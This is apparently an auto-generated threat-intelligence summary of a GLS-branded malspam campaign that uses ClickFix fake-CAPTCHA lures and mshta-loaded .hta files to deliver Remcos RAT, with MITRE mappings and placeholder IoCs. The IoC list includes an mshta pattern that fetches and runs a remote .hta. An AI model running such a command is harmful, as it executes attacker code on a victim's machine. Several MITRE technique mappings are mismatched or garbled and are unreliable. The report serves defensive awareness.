A large-scale malspam campaign is using GLS-branded emails with an attached XHTML that decodes obfuscated JavaScript to redirect victims to a Netlify-hosted phishing site which uses the ClickFix social-engineering technique to trick users into pasting and running terminal commands. Analysis of a downloaded binary found a SETTINGS resource matching Remcos RAT configuration, indicating likely Remcos-based remote access and data-stealing activity. #Remcos
Keypoints
- The campaign uses GLS-themed malspam with the subject “Invalid address, please fill out form 8900395” to lure victims.
- An attached XHTML contains XOR-obfuscated JavaScript that redirects users to a malicious Netlify domain.
- The phishing site impersonates the GLS portal and employs ClickFix social engineering to get users to paste and run commands.
- Victims are tricked by a fake CAPTCHA into running an mshta command that loads a remote .hta file with a variable parameter.
- The .hta is fully obfuscated with XOR decoding and launches a payload that downloads and executes a binary from a secondary domain.
- Preliminary binary analysis found a SETTINGS resource consistent with Remcos RAT, suggesting remote access and payload execution capabilities.
- CERT-AGID has shared IoCs with accredited organizations; public IoCs were referenced for wider dissemination.
MITRE Techniques
- [T1566 ] Phishing – Malicious GLS-branded emails with subject “Invalid address, please fill out form 8900395” are used to lure recipients into opening an attached XHTML that contains obfuscated JavaScript. Quote: ‘…the emails have the subject “Invalid address, please fill out form 8900395” and contain text that simulates a communication from GLS customer service…’
- [T1204.002 ] User Execution: Malicious File – The attached XHTML contains XOR-obfuscated JavaScript which, when opened by the user, decodes and redirects to the phishing site. Quote: ‘…the attachment, an XHTML file, contains JavaScript code obfuscated using XOR operations…’
- [T1059.007 ] Command and Scripting Interpreter: MSHTA – The campaign instructs victims to run an mshta command that loads a remote .hta file with a parameter acting as an identifier. Quote: ‘…an mshta command is executed which calls a remote .hta file passing a parameter…’
- [T1204.001 ] User Execution: Malicious Link – JavaScript decodes and redirects users to a Netlify-hosted malicious domain that impersonates the GLS portal. Quote: ‘…once decoded, it redirects the user to the malicious domain hosted on the Netlify platform.’
- [T1204.002 ] User Execution: Malicious File (ClickFix social engineering) – The phishing site uses a fake CAPTCHA and social-engineering instructions to convince users to paste and execute commands, causing manual activation of malware. Quote: ‘…it uses a fake CAPTCHA to convince the user to perform seemingly legitimate actions (pasting commands…)’
- [T1105 ] Ingress Tool Transfer – The .hta downloads a binary from a secondary domain which is then executed on the victim system. Quote: ‘…the payload aims to download a binary file from a secondary domain and run it on the system.’
- [T1040 ] Network Sniffing / T1020 ] Automated Exfiltration? (configuration extraction) – Analysis extracted a SETTINGS resource from the binary revealing C2 and agent configuration consistent with Remcos RAT, used for remote control and data collection. Quote: ‘…the presence of a SETTINGS resource, a typical element found in samples of Remcos RAT.’
Indicators of Compromise
- [Domains ] Malicious hosting and payload delivery – Netlify-hosted phishing domain (Netlify-hosted domain example), secondary domain serving binary (secondary domain example).
- [File names ] Malicious attachments and payloads – XHTML attachment (example: malicious_form.xhtml), remote .hta referenced by mshta (example: payload.hta).
- [Resources ] Binary internals indicating RAT family – SETTINGS resource inside binary matching Remcos configuration (example: SETTINGS resource found), and other configuration values (agent ID, C2 endpoints).
- [Commands ] Social-engineering commands executed by victims – mshta command invoking remote .hta with a variable parameter (example pattern: mshta http://…/payload.hta?ID=xxxx).
- [Reports/Feeds ] Shared IoCs – CERT-AGID IoC feed referenced (CERT-AGID IoC feed link), plus “Download IoC” link provided in the report.